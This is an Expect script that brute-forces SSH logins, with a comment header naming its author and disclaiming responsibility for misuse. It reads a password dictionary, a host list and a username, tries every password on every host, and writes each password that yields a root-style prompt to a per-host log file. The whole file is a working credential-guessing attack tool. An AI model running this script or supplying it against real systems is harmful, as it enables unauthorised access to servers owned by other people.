#!/usr/bin/expect -f
#    
#    Written by James Shanahan(jshanahan@comcastpc.com)
#    ssh brute forcer    
#    This will alow you to specify hosts, password lists, and a user
#    I do not take any reponsibilty for what you do with this tool
#    Hopefully it will make your life easier rather then making other
#    peoples lifes more difficult!
    
set timeout 4 
set dictionary [lindex $argv 0]
set file [lindex $argv 1]
set user [lindex $argv 2]

if {[llength $argv] != 3} {
   puts stderr "Usage: $argv0 <dictionary-file> <hosts-file <user>\n"
   exit }

set tryHost [open $file r]
set tryPass [open $dictionary r]
set passwords [read $tryPass]
set hosts [read $tryHost]

foreach ip $hosts {
  foreach passwd $passwords {
    spawn ssh $user@$ip
    expect ":"
      send "$passwd\n"
    set logFile [open $ip.log a]  
    expect "#" { 
      puts $logFile "password for $ip is $passwd\n" 
    }
    
    set id [exp_pid]
    exec kill -INT $id  
  }
}